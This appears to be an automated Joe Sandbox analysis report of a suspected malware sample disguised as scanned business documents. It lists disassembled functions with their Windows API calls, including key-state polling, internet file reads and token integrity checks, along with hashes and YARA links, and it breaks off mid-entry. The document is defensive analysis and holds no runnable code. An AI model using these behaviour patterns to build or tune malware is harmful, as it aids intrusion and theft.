                                                      • Associated: 00000000.00000002.1657649717.0000000000354000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_280000_Scanned Docs from Emnes Metal Sdn Bhd_.jbxd
                                                      Similarity
                                                      • API ID: _free
                                                      • String ID:
                                                      • API String ID: 269201875-0
                                                      • Opcode ID: 9838de0dcc59470023c632d18c65557947c5df01d26bb9966f7f8fcd722dbf32
                                                      • Instruction ID: e8322df2d3f4164c8594b784cac9176fd56070e559e6d519068557cb2c29e258
                                                      • Opcode Fuzzy Hash: 9838de0dcc59470023c632d18c65557947c5df01d26bb9966f7f8fcd722dbf32
                                                      • Instruction Fuzzy Hash: 9341E232A20300EFCB24DF78C880A9DB7A5EF89354F154568E515EB352DB31ED15CB90
                                                      Function 0029912D Relevance: 7.6, APIs: 5, Instructions: 121keyboardCOMMON
                                                      Download Yara Rule
                                                      APIs
                                                      • GetCursorPos.USER32(?), ref: 00299141
                                                      • ScreenToClient.USER32(00000000,?), ref: 0029915E
                                                      • GetAsyncKeyState.USER32(00000001), ref: 00299183
                                                      • GetAsyncKeyState.USER32(00000002), ref: 0029919D
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.1657541035.0000000000281000.00000020.00000001.01000000.00000003.sdmp, Offset: 00280000, based on PE: true
                                                      • Associated: 00000000.00000002.1657524715.0000000000280000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1657587591.000000000031C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1657587591.0000000000342000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1657624265.000000000034C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1657649717.0000000000354000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_280000_Scanned Docs from Emnes Metal Sdn Bhd_.jbxd
                                                      Similarity
                                                      • API ID: AsyncState$ClientCursorScreen
                                                      • String ID:
                                                      • API String ID: 4210589936-0
                                                      • Opcode ID: 092579ec0bead5eb89a0a6b56bce19d2030a101440c60bd54e7fe8ab96084734
                                                      • Instruction ID: 30af34ed3a761d5162359ef916ac24f3358b0f997e79e3e695eefe1027599b14
                                                      • Opcode Fuzzy Hash: 092579ec0bead5eb89a0a6b56bce19d2030a101440c60bd54e7fe8ab96084734
                                                      • Instruction Fuzzy Hash: 07415E3191851BABDF199F68C844BEEB775FF09320F20831AE429A62D0D7745DA0DB91
                                                      Function 002F3874 Relevance: 7.6, APIs: 5, Instructions: 101windowCOMMON
                                                      Download Yara Rule
                                                      APIs
                                                      • GetInputState.USER32 ref: 002F38CB
                                                      • TranslateAcceleratorW.USER32(?,00000000,?), ref: 002F3922
                                                      • TranslateMessage.USER32(?), ref: 002F394B
                                                      • DispatchMessageW.USER32(?), ref: 002F3955
                                                      • PeekMessageW.USER32(?,00000000,00000000,00000000,00000001), ref: 002F3966
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.1657541035.0000000000281000.00000020.00000001.01000000.00000003.sdmp, Offset: 00280000, based on PE: true
                                                      • Associated: 00000000.00000002.1657524715.0000000000280000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1657587591.000000000031C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1657587591.0000000000342000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1657624265.000000000034C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1657649717.0000000000354000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_280000_Scanned Docs from Emnes Metal Sdn Bhd_.jbxd
                                                      Similarity
                                                      • API ID: Message$Translate$AcceleratorDispatchInputPeekState
                                                      • String ID:
                                                      • API String ID: 2256411358-0
                                                      • Opcode ID: ce137f7c9329dc4344456b19096ef6427d8cb99ffb077a6143f6d995cbe88dc6
                                                      • Instruction ID: 1c1a2aa250ff1bf43b9e64d566db6a95d3eb991c771c4dd852507deb8710b710
                                                      • Opcode Fuzzy Hash: ce137f7c9329dc4344456b19096ef6427d8cb99ffb077a6143f6d995cbe88dc6
                                                      • Instruction Fuzzy Hash: C031C67057434B9EEB36CF359858BB6B7ACAB05381F04057DE662821A0E3F49A94CB51
                                                      Function 002FCF1A Relevance: 7.6, APIs: 5, Instructions: 93networkfileCOMMON
                                                      Download Yara Rule
                                                      APIs
                                                      • InternetQueryDataAvailable.WININET(?,?,00000000,00000000), ref: 002FCF38
                                                      • InternetReadFile.WININET(?,00000000,?,?), ref: 002FCF6F
                                                      • GetLastError.KERNEL32(?,00000000,?,?,?,002FC21E,00000000), ref: 002FCFB4
                                                      • SetEvent.KERNEL32(?,?,00000000,?,?,?,002FC21E,00000000), ref: 002FCFC8
                                                      • SetEvent.KERNEL32(?,?,00000000,?,?,?,002FC21E,00000000), ref: 002FCFF2
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.1657541035.0000000000281000.00000020.00000001.01000000.00000003.sdmp, Offset: 00280000, based on PE: true
                                                      • Associated: 00000000.00000002.1657524715.0000000000280000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1657587591.000000000031C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1657587591.0000000000342000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1657624265.000000000034C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1657649717.0000000000354000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_280000_Scanned Docs from Emnes Metal Sdn Bhd_.jbxd
                                                      Similarity
                                                      • API ID: EventInternet$AvailableDataErrorFileLastQueryRead
                                                      • String ID:
                                                      • API String ID: 3191363074-0
                                                      • Opcode ID: a5393a81d1f34c7843fbe3a9b1383ccdefa6850404ffe52882aeccc28ddc3f52
                                                      • Instruction ID: b981d3a3364210eede3b79fc6a756bf8267d2cd047ea994a57cdcd86b82cba8b
                                                      • Opcode Fuzzy Hash: a5393a81d1f34c7843fbe3a9b1383ccdefa6850404ffe52882aeccc28ddc3f52
                                                      • Instruction Fuzzy Hash: 10317F7152020EAFDB20DFA5CA849BBFBF9EB04390B20853EF606D2550D730AE51DB60
                                                      Function 002E1901 Relevance: 7.6, APIs: 5, Instructions: 93sleepwindowCOMMON
                                                      Download Yara Rule
                                                      APIs
                                                      • GetWindowRect.USER32(?,?), ref: 002E1915
                                                      • PostMessageW.USER32(00000001,00000201,00000001), ref: 002E19C1
                                                      • Sleep.KERNEL32(00000000,?,?,?), ref: 002E19C9
                                                      • PostMessageW.USER32(00000001,00000202,00000000), ref: 002E19DA
                                                      • Sleep.KERNEL32(00000000,?,?,?,?), ref: 002E19E2
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.1657541035.0000000000281000.00000020.00000001.01000000.00000003.sdmp, Offset: 00280000, based on PE: true
                                                      • Associated: 00000000.00000002.1657524715.0000000000280000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1657587591.000000000031C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1657587591.0000000000342000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1657624265.000000000034C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1657649717.0000000000354000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_280000_Scanned Docs from Emnes Metal Sdn Bhd_.jbxd
                                                      Similarity
                                                      • API ID: MessagePostSleep$RectWindow
                                                      • String ID:
                                                      • API String ID: 3382505437-0
                                                      • Opcode ID: 798b64674936bfedfe0a287ae82cf3a9e8b8a7ef57c8f37c3ea758d30b6931a6
                                                      • Instruction ID: d8212bcba21d8a73a0791e096a922e43ef3a392376b3d5a3d1e67daac38692dd
                                                      • Opcode Fuzzy Hash: 798b64674936bfedfe0a287ae82cf3a9e8b8a7ef57c8f37c3ea758d30b6931a6
                                                      • Instruction Fuzzy Hash: 9231D471A50259EFCB00CFA9CD99ADE7BB5EB08315F108225F921A72D1C7709D64CB90
                                                      Function 00315706 Relevance: 7.6, APIs: 5, Instructions: 82windowCOMMON
                                                      Download Yara Rule
                                                      APIs
                                                      • SendMessageW.USER32(?,00001053,000000FF,?), ref: 00315745
                                                      • SendMessageW.USER32(?,00001074,?,00000001), ref: 0031579D
                                                      • _wcslen.LIBCMT ref: 003157AF
                                                      • _wcslen.LIBCMT ref: 003157BA
                                                      • SendMessageW.USER32(?,00001002,00000000,?), ref: 00315816
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.1657541035.0000000000281000.00000020.00000001.01000000.00000003.sdmp, Offset: 00280000, based on PE: true
                                                      • Associated: 00000000.00000002.1657524715.0000000000280000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1657587591.000000000031C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1657587591.0000000000342000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1657624265.000000000034C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1657649717.0000000000354000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_280000_Scanned Docs from Emnes Metal Sdn Bhd_.jbxd
                                                      Similarity
                                                      • API ID: MessageSend$_wcslen
                                                      • String ID:
                                                      • API String ID: 763830540-0
                                                      • Opcode ID: 87d1103dd731ef0adac65fafcf72df8cd24a510ae1f04003b4f821e1c5847e81
                                                      • Instruction ID: 6864165e9a181c62f5da5161911a7200c332999f479595867df4346ba5cc9b79
                                                      • Opcode Fuzzy Hash: 87d1103dd731ef0adac65fafcf72df8cd24a510ae1f04003b4f821e1c5847e81
                                                      • Instruction Fuzzy Hash: C421A231904618DADB229FA1CC85AEEB7BCFF88325F108216E929EA1C0D77089C5CF50
                                                      Function 00300930 Relevance: 7.6, APIs: 5, Instructions: 69COMMON
                                                      Download Yara Rule
                                                      APIs
                                                      • IsWindow.USER32(00000000), ref: 00300951
                                                      • GetForegroundWindow.USER32 ref: 00300968
                                                      • GetDC.USER32(00000000), ref: 003009A4
                                                      • GetPixel.GDI32(00000000,?,00000003), ref: 003009B0
                                                      • ReleaseDC.USER32(00000000,00000003), ref: 003009E8
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.1657541035.0000000000281000.00000020.00000001.01000000.00000003.sdmp, Offset: 00280000, based on PE: true
                                                      • Associated: 00000000.00000002.1657524715.0000000000280000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1657587591.000000000031C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1657587591.0000000000342000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1657624265.000000000034C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1657649717.0000000000354000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_280000_Scanned Docs from Emnes Metal Sdn Bhd_.jbxd
                                                      Similarity
                                                      • API ID: Window$ForegroundPixelRelease
                                                      • String ID:
                                                      • API String ID: 4156661090-0
                                                      • Opcode ID: f4e42aa75444fa2ed50e8a63a1a0144f0cd5759d880e3e5082f332a39c4feb42
                                                      • Instruction ID: a7c3cc3b2362c57fc5fc250025c43d278496a458b9a0b6b1667dfe1b9a82df7f
                                                      • Opcode Fuzzy Hash: f4e42aa75444fa2ed50e8a63a1a0144f0cd5759d880e3e5082f332a39c4feb42
                                                      • Instruction Fuzzy Hash: 41218E79610204AFD705EF65D894AAEBBE9EF48740F04807DE94A977A2CB70AC14CF50
                                                      Function 002BCDBD Relevance: 7.6, APIs: 5, Instructions: 68COMMON
                                                      Download Yara Rule
                                                      APIs
                                                      • GetEnvironmentStringsW.KERNEL32 ref: 002BCDC6
                                                      • WideCharToMultiByte.KERNEL32(00000000,00000000,00000000,00000000,00000000,00000000,00000000,00000000), ref: 002BCDE9
                                                        • Part of subcall function 002B3820: RtlAllocateHeap.NTDLL(00000000,?,00351444,?,0029FDF5,?,?,0028A976,00000010,00351440,002813FC,?,002813C6,?,00281129), ref: 002B3852
                                                      • WideCharToMultiByte.KERNEL32(00000000,00000000,00000000,00000000,00000000,?,00000000,00000000), ref: 002BCE0F
                                                      • _free.LIBCMT ref: 002BCE22
                                                      • FreeEnvironmentStringsW.KERNEL32(00000000), ref: 002BCE31
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.1657541035.0000000000281000.00000020.00000001.01000000.00000003.sdmp, Offset: 00280000, based on PE: true
                                                      • Associated: 00000000.00000002.1657524715.0000000000280000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1657587591.000000000031C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1657587591.0000000000342000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1657624265.000000000034C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1657649717.0000000000354000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_280000_Scanned Docs from Emnes Metal Sdn Bhd_.jbxd
                                                      Similarity
                                                      • API ID: ByteCharEnvironmentMultiStringsWide$AllocateFreeHeap_free
                                                      • String ID:
                                                      • API String ID: 336800556-0
                                                      • Opcode ID: 69fcaf51d8af4d91b78464069526e58523550eccb82c465f15b617079dc2835d
                                                      • Instruction ID: c454af3b7956c94bb66bf581038cc7d766dc1f2d967126e3faa173f5506a2158
                                                      • Opcode Fuzzy Hash: 69fcaf51d8af4d91b78464069526e58523550eccb82c465f15b617079dc2835d
                                                      • Instruction Fuzzy Hash: 1F01FC72621216BF23221A766C4CCFB796DDEC6BE13254129FD05CB200DA60CD2181B0
                                                      Function 00299639 Relevance: 7.6, APIs: 5, Instructions: 66COMMON
                                                      Download Yara Rule
                                                      APIs
                                                      • ExtCreatePen.GDI32(?,?,00000000,00000000,00000000,?,00000000), ref: 00299693
                                                      • SelectObject.GDI32(?,00000000), ref: 002996A2
                                                      • BeginPath.GDI32(?), ref: 002996B9
                                                      • SelectObject.GDI32(?,00000000), ref: 002996E2
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.1657541035.0000000000281000.00000020.00000001.01000000.00000003.sdmp, Offset: 00280000, based on PE: true
                                                      • Associated: 00000000.00000002.1657524715.0000000000280000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1657587591.000000000031C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1657587591.0000000000342000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1657624265.000000000034C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1657649717.0000000000354000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_280000_Scanned Docs from Emnes Metal Sdn Bhd_.jbxd
                                                      Similarity
                                                      • API ID: ObjectSelect$BeginCreatePath
                                                      • String ID:
                                                      • API String ID: 3225163088-0
                                                      • Opcode ID: 8a76d80f5c940757b979a7b61f11fe2e9b62402ea50898f1e79e547143b454f4
                                                      • Instruction ID: 4ba9e368be124139fce1628bcec1a10c77329cb993986e4e4794ce10b72d8908
                                                      • Opcode Fuzzy Hash: 8a76d80f5c940757b979a7b61f11fe2e9b62402ea50898f1e79e547143b454f4
                                                      • Instruction Fuzzy Hash: 9F217C71822306EBDF129F68EC187E93BADBB15366F10421AF411A61B0D3709CA1CFD4
                                                      Function 002E5711 Relevance: 7.6, APIs: 5, Instructions: 61COMMON
                                                      Download Yara Rule
                                                      APIs
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.1657541035.0000000000281000.00000020.00000001.01000000.00000003.sdmp, Offset: 00280000, based on PE: true
                                                      • Associated: 00000000.00000002.1657524715.0000000000280000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1657587591.000000000031C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1657587591.0000000000342000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1657624265.000000000034C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1657649717.0000000000354000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_280000_Scanned Docs from Emnes Metal Sdn Bhd_.jbxd
                                                      Similarity
                                                      • API ID: _memcmp
                                                      • String ID:
                                                      • API String ID: 2931989736-0
                                                      • Opcode ID: e4fab2ad3e61f6fcef76e195aecee63f1213b0540fb3750056cef85f34b6af00
                                                      • Instruction ID: d65da8d015d5309d5ad4920e7316e8f41baea832f5b68c903284793cbb2582b9
                                                      • Opcode Fuzzy Hash: e4fab2ad3e61f6fcef76e195aecee63f1213b0540fb3750056cef85f34b6af00
                                                      • Instruction Fuzzy Hash: 4501B9616F5665FFD60D99129D52FFBB35C9B253A8F804020FD049A241FB70ED7086E0
                                                      Function 002B2DF8 Relevance: 7.6, APIs: 5, Instructions: 53COMMONLIBRARYCODE
                                                      Download Yara Rule
                                                      APIs
                                                      • GetLastError.KERNEL32(?,?,?,002AF2DE,002B3863,00351444,?,0029FDF5,?,?,0028A976,00000010,00351440,002813FC,?,002813C6), ref: 002B2DFD
                                                      • _free.LIBCMT ref: 002B2E32
                                                      • _free.LIBCMT ref: 002B2E59
                                                      • SetLastError.KERNEL32(00000000,00281129), ref: 002B2E66
                                                      • SetLastError.KERNEL32(00000000,00281129), ref: 002B2E6F
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.1657541035.0000000000281000.00000020.00000001.01000000.00000003.sdmp, Offset: 00280000, based on PE: true
                                                      • Associated: 00000000.00000002.1657524715.0000000000280000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1657587591.000000000031C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1657587591.0000000000342000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1657624265.000000000034C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1657649717.0000000000354000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_280000_Scanned Docs from Emnes Metal Sdn Bhd_.jbxd
                                                      Similarity
                                                      • API ID: ErrorLast$_free
                                                      • String ID:
                                                      • API String ID: 3170660625-0
                                                      • Opcode ID: 9bbee01be2fb40b6fcf37767969ba880dadddb8943d0a00aecc3b70091d10168
                                                      • Instruction ID: 1b6e45929fed9f8ee2538c3f6388592edee0ce67ae083b99e9f0be861e88673c
                                                      • Opcode Fuzzy Hash: 9bbee01be2fb40b6fcf37767969ba880dadddb8943d0a00aecc3b70091d10168
                                                      • Instruction Fuzzy Hash: 6F01F936175701E7C6136B366C45DEB255DABC93E5B245428F825A2193EE74EC294420
                                                      Function 002E000E Relevance: 7.5, APIs: 5, Instructions: 47stringCOMMON
                                                      Download Yara Rule
                                                      APIs
                                                      • CLSIDFromProgID.OLE32(?,?,?,00000000,?,?,?,-C000001E,00000001,?,002DFF41,80070057,?,?,?,002E035E), ref: 002E002B
                                                      • ProgIDFromCLSID.OLE32(?,00000000,?,?,?,00000000,?,?,?,-C000001E,00000001,?,002DFF41,80070057,?,?), ref: 002E0046
                                                      • lstrcmpiW.KERNEL32(?,00000000,?,?,?,00000000,?,?,?,-C000001E,00000001,?,002DFF41,80070057,?,?), ref: 002E0054
                                                      • CoTaskMemFree.OLE32(00000000,?,00000000,?,?,?,00000000,?,?,?,-C000001E,00000001,?,002DFF41,80070057,?), ref: 002E0064
                                                      • CLSIDFromString.OLE32(?,?,?,?,?,00000000,?,?,?,-C000001E,00000001,?,002DFF41,80070057,?,?), ref: 002E0070
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.1657541035.0000000000281000.00000020.00000001.01000000.00000003.sdmp, Offset: 00280000, based on PE: true
                                                      • Associated: 00000000.00000002.1657524715.0000000000280000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1657587591.000000000031C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1657587591.0000000000342000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1657624265.000000000034C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1657649717.0000000000354000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_280000_Scanned Docs from Emnes Metal Sdn Bhd_.jbxd
                                                      Similarity
                                                      • API ID: From$Prog$FreeStringTasklstrcmpi
                                                      • String ID:
                                                      • API String ID: 3897988419-0
                                                      • Opcode ID: f05363758b8675f20c756b8a669f1b786d66f466027521327b8df2136c887aff
                                                      • Instruction ID: 1f0528a041ff9d1d08f0166bf7380a8c98de00af331b1d546876190740f7de6a
                                                      • Opcode Fuzzy Hash: f05363758b8675f20c756b8a669f1b786d66f466027521327b8df2136c887aff
                                                      • Instruction Fuzzy Hash: DE01F2726A0214BFDB119F6ADC84BEA7AEDEF48351F149024F805D2210D7B0DD818BA0
                                                      Function 002EE97B Relevance: 7.5, APIs: 5, Instructions: 47sleepCOMMON
                                                      Download Yara Rule
                                                      APIs
                                                      • QueryPerformanceCounter.KERNEL32(?), ref: 002EE997
                                                      • QueryPerformanceFrequency.KERNEL32(?), ref: 002EE9A5
                                                      • Sleep.KERNEL32(00000000), ref: 002EE9AD
                                                      • QueryPerformanceCounter.KERNEL32(?), ref: 002EE9B7
                                                      • Sleep.KERNEL32 ref: 002EE9F3
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.1657541035.0000000000281000.00000020.00000001.01000000.00000003.sdmp, Offset: 00280000, based on PE: true
                                                      • Associated: 00000000.00000002.1657524715.0000000000280000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1657587591.000000000031C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1657587591.0000000000342000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1657624265.000000000034C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1657649717.0000000000354000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_280000_Scanned Docs from Emnes Metal Sdn Bhd_.jbxd
                                                      Similarity
                                                      • API ID: PerformanceQuery$CounterSleep$Frequency
                                                      • String ID:
                                                      • API String ID: 2833360925-0
                                                      • Opcode ID: 4a525413fa4918045d71455d56743affc875730e1b218a20e1bd6f1dfdf632d9
                                                      • Instruction ID: 9581e8cbf32d1dafc75f0d54fdb8bc537e48e7217f34c25287c8951366327458
                                                      • Opcode Fuzzy Hash: 4a525413fa4918045d71455d56743affc875730e1b218a20e1bd6f1dfdf632d9
                                                      • Instruction Fuzzy Hash: 2B015B31CA1629EBCF009FE6D849AEDBBB8BB0C300F414556E502B2242DB309564CBA2
                                                      Function 002E10F9 Relevance: 7.5, APIs: 5, Instructions: 46memoryCOMMON
                                                      Download Yara Rule
                                                      APIs
                                                      • GetUserObjectSecurity.USER32(?,00000004,?,00000000,?), ref: 002E1114
                                                      • GetLastError.KERNEL32(?,00000000,00000000,?,?,002E0B9B,?,?,?), ref: 002E1120
                                                      • GetProcessHeap.KERNEL32(00000008,?,?,00000000,00000000,?,?,002E0B9B,?,?,?), ref: 002E112F
                                                      • HeapAlloc.KERNEL32(00000000,?,00000000,00000000,?,?,002E0B9B,?,?,?), ref: 002E1136
                                                      • GetUserObjectSecurity.USER32(?,00000004,00000000,?,?), ref: 002E114D
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.1657541035.0000000000281000.00000020.00000001.01000000.00000003.sdmp, Offset: 00280000, based on PE: true
                                                      • Associated: 00000000.00000002.1657524715.0000000000280000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1657587591.000000000031C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1657587591.0000000000342000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1657624265.000000000034C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1657649717.0000000000354000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_280000_Scanned Docs from Emnes Metal Sdn Bhd_.jbxd
                                                      Similarity
                                                      • API ID: HeapObjectSecurityUser$AllocErrorLastProcess
                                                      • String ID:
                                                      • API String ID: 842720411-0
                                                      • Opcode ID: e09eeaaae4cf56be96f97e3d3c91725021da546030a8cf62892edf023d5bdfb6
                                                      • Instruction ID: 46468df91520c7587c5a265339e8e189ac66b0166d39b441e4a230e95c12c3e6
                                                      • Opcode Fuzzy Hash: e09eeaaae4cf56be96f97e3d3c91725021da546030a8cf62892edf023d5bdfb6
                                                      • Instruction Fuzzy Hash: 2A011D79190305BFDB124F65DC49AAA3B6EEF89360F504425FA45D7350DA71DC209A60
                                                      Function 002E0FB4 Relevance: 7.5, APIs: 5, Instructions: 43memoryCOMMON
                                                      Download Yara Rule
                                                      APIs
                                                      • GetTokenInformation.ADVAPI32(?,00000002,?,00000000,?), ref: 002E0FCA
                                                      • GetLastError.KERNEL32(?,00000002,?,00000000,?), ref: 002E0FD6
                                                      • GetProcessHeap.KERNEL32(00000008,?,?,00000002,?,00000000,?), ref: 002E0FE5
                                                      • HeapAlloc.KERNEL32(00000000,?,00000002,?,00000000,?), ref: 002E0FEC
                                                      • GetTokenInformation.ADVAPI32(?,00000002,00000000,?,?,?,00000002,?,00000000,?), ref: 002E1002
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.1657541035.0000000000281000.00000020.00000001.01000000.00000003.sdmp, Offset: 00280000, based on PE: true
                                                      • Associated: 00000000.00000002.1657524715.0000000000280000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1657587591.000000000031C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1657587591.0000000000342000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1657624265.000000000034C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1657649717.0000000000354000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_280000_Scanned Docs from Emnes Metal Sdn Bhd_.jbxd
                                                      Similarity
                                                      • API ID: HeapInformationToken$AllocErrorLastProcess
                                                      • String ID:
                                                      • API String ID: 44706859-0
                                                      • Opcode ID: a45507611feb5c47382ccb99f35c38c00a49283d8f931ea74f9ac8b85a1b8271
                                                      • Instruction ID: c2bbbee82488da5b6d2d00ba9194c43daabcbfa28e10b4be98862e74641aa373
                                                      • Opcode Fuzzy Hash: a45507611feb5c47382ccb99f35c38c00a49283d8f931ea74f9ac8b85a1b8271
                                                      • Instruction Fuzzy Hash: 7BF0AF39190301BBD7220FA5DC49F963B6EEF8D761F518824F905C6290CA30DC508A60
                                                      Function 002E1014 Relevance: 7.5, APIs: 5, Instructions: 43memoryCOMMON
                                                      Download Yara Rule
                                                      APIs
                                                      • GetTokenInformation.ADVAPI32(?,00000003(TokenIntegrityLevel),?,00000000,?), ref: 002E102A
                                                      • GetLastError.KERNEL32(?,TokenIntegrityLevel,?,00000000,?), ref: 002E1036
                                                      • GetProcessHeap.KERNEL32(00000008,?,?,TokenIntegrityLevel,?,00000000,?), ref: 002E1045
                                                      • HeapAlloc.KERNEL32(00000000,?,TokenIntegrityLevel,?,00000000,?), ref: 002E104C
                                                      • GetTokenInformation.ADVAPI32(?,00000003(TokenIntegrityLevel),00000000,?,?,?,TokenIntegrityLevel,?,00000000,?), ref: 002E1062
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.1657541035.0000000000281000.00000020.00000001.01000000.00000003.sdmp, Offset: 00280000, based on PE: true
                                                      • Associated: 00000000.00000002.1657524715.0000000000280000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1657587591.000000000031C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1657587591.0000000000342000.00000002.00000001.01000000.00000003.sdmpDownload File
